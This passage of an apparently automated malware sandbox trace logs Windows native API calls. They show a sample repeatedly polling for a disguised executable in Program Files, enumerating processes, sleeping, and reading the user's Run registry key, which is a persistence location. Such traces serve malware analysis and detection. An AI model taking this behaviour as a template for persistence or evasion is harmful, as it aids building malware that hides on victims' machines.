(x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.660] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.660] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0291.660] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.660] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.660] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0291.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.841] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.842] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.843] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.843] NtClose (Handle=0x338) returned 0x0 [0291.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.843] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.843] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0291.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.843] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.843] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0291.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.848] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0291.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0291.963] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0291.965] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0291.966] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0291.966] NtClose (Handle=0x338) returned 0x0 [0291.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.966] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.967] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0291.967] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0291.967] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0291.967] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0291.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0291.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0291.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0291.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0291.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.124] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.126] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.128] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.128] NtClose (Handle=0x338) returned 0x0 [0292.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.128] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.128] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0292.128] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.128] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.128] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0292.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.281] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.282] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.283] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.283] NtClose (Handle=0x338) returned 0x0 [0292.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.283] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.283] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0292.283] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.283] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.284] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de1a0) returned 1 [0292.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.284] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.441] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.443] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.445] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.445] NtClose (Handle=0x338) returned 0x0 [0292.445] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.445] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.445] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0292.445] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.445] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.445] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0292.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.448] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.561] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.563] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.564] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.564] NtClose (Handle=0x338) returned 0x0 [0292.564] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.564] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.564] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dde20) returned 1 [0292.564] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.564] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.565] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5dec20) returned 1 [0292.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 